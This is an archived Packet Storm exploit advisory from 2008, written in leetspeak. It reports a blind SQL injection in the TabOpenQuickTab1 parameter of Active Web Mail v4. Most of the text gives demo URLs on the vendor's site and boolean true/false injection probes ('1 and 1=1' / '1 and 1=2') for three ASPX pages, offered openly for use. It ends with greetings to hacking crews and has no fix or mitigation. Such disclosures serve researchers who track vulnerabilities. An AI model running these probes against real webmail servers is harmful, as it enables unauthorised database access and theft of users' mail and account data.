activewebmail-blindsql.txt

2008-11-30T00:00:00
ID PACKETSTORM:72447
Type packetstorm
Reporter R3d-D3v!L
Modified 2008-11-30T00:00:00

Description

                                        
                                            `[~] ----------------------------بسم الله الرحمن الرحيم------------------------------  
[~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability  
  
[~]Vendor:www.activewebsoftwares.com  
  
[~]Software: Active Web Mail v 4  
  
[~]author: ((я3d D3v!L))  
  
[~] Date: 28.11.2008  
  
[~] Home: www.ahacker.biz  
  
[~] contact: N/A  
  
[~] -----------------------------------------------------------  
  
  
[~]3xpL0!7 4 d3m0:  
  
www.activewebsoftwares.com/DemoActiveWebmail/popaccounts.aspx?TabOpenQuickTab1={bL!ND}  
  
0R   
  
www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke}  
  
oя  
  
www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((я3d D3v!L))  
  
[~] 8L!/\/D:  
  
7Ru3 : popaccounts.aspx?TabOpenQuickTab1=1 and 1=1  
  
f4L53: popaccounts.aspx?TabOpenQuickTab1=1 and 1=2  
  
0R  
  
7Ru3 : addressbook.aspx?TabOpenQuickTab1=1 and 1=1  
  
f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2  
  
0я  
  
7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1  
  
f4L53: emails.aspx?TabOpenQuickTab1=1 and 1=2  
  
N073:  
  
! 7h!/\/k u can f!nd m0r3   
  
just let your m1nd breath ;)  
  
[~]--------------------------------------------------------------------------------  
  
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري  
[~]  
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}  
[~]  
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller  
[~]  
[~] xp10.biz & ahacker.biz  
[~]  
  
[~]--------------------------------------------------------------------------------  
  
`